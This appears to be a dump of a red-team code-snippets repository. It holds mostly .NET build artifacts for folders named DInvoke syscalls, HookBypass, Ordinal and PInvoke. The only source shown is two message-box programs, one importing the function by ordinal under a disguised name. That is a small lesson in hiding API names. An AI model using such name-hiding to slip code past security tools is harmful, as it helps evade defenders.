--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke_Syscalls\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | b31ed79f3e4190b809f1aa8db22f513b40fba58a
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "idqgkXj4YR79iFvMjG/5hb5UhChBxPT5UUcFWEq/bFVUqYDfRbpnPsOPfseDkfNQniGO0Ynq1BYiK5kkuK29aA==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke_Syscalls\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "ConsoleApp1.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "ConsoleApp1/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\HookBypass\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | ee34b10399e914a8aedc3d5bcc7c2cad3704dcb8
2 |
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/HookBypass/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "Qa6dvrVwNTxdRmvSiTGiddzLTnQou+7/9KlhkWeN3bCzmLieRFrfYHHUPK9NFcoZBQzQag36RTDJtgYLvXGWOg==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\HookBypass\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/HookBypass/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace Ordinals
5 | {
6 | internal class Program
7 | { //WE USE PEVIEW -> SECTION .TEXT -> EXPORT ADDRESS TABLE -> MESSAGEBOXW TO FIND ORDINAL 0X0874 -> 2164
8 | [DllImport("user32.dll", EntryPoint = "#2164", CharSet = CharSet.Unicode)]
9 | static extern int NotAMessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);
10 |
11 | static void Main(string[] args)
12 | {
13 | NotAMessageBox(IntPtr.Zero, "Ordinal!!", "Ordinal", 0);
14 | }
15 |
16 | }
17 |
18 |
19 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "message_box_ordinal/1.0.0": {
10 | "runtime": {
11 | "message_box_ordinal.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "message_box_ordinal/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.dll
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.exe
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.pdb
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/bin/Debug/netcoreapp3.1/message_box_ordinal.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/message_box_ordinal.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 812328a406d511f0cb86ca1de9b6c979e8ce68f5
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = message_box_ordinal
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\message_box_ordinal\message_box_ordinal\
4 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.assets.cache
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 94ce58349191cbc449fdb3720ceffeb425f4bcfd
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.dll
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 46fa7d9c7209793a53c6eecb31254525cde9465c
2 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/Ordinal/message_box_ordinal/obj/Debug/netcoreapp3.1/message_box_ordinal.pdb
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/message_box_ordinal.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/Ordinal/message_box_ordinal/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "n5d2sI7PqLshZtvMBRBPM2qNVlUVNYYAUTAH+ZMLHmHyoGv2yIjUZjDc77tEFY16/f0OCJ+2eQ8tm1h8ABO9rQ==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\message_box_ordinal\\message_box_ordinal\\message_box_ordinal.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/PInvoke.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace PInvoke
5 | {
6 | internal class Program
7 | {
8 | [DllImport("user32.dll", CharSet = CharSet.Unicode)]
9 | static extern int MessageBoxW(IntPtr hWnd, string lpText, string lpCaption, uint uType);
10 |
11 | static void Main(string[] args)
12 | {
13 | MessageBoxW(IntPtr.Zero, "My first P/Invoke", "Hello World!", 0);
14 | }
15 |
16 | }
17 |
18 |
19 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "PInvoke/1.0.0": {
10 | "runtime": {
11 | "PInvoke.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "PInvoke/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 9e757931411dfb9bdddde4d3b5e0787e30c22b30
2 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = PInvoke
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\PInvoke\PInvoke\
4 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | fc9c814ed963a5f84495ebe65f08a3299e1d96f2
2 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 9ef52f5bd7f4cff3d652c0e7935269a83934d959
2 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/PInvoke.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
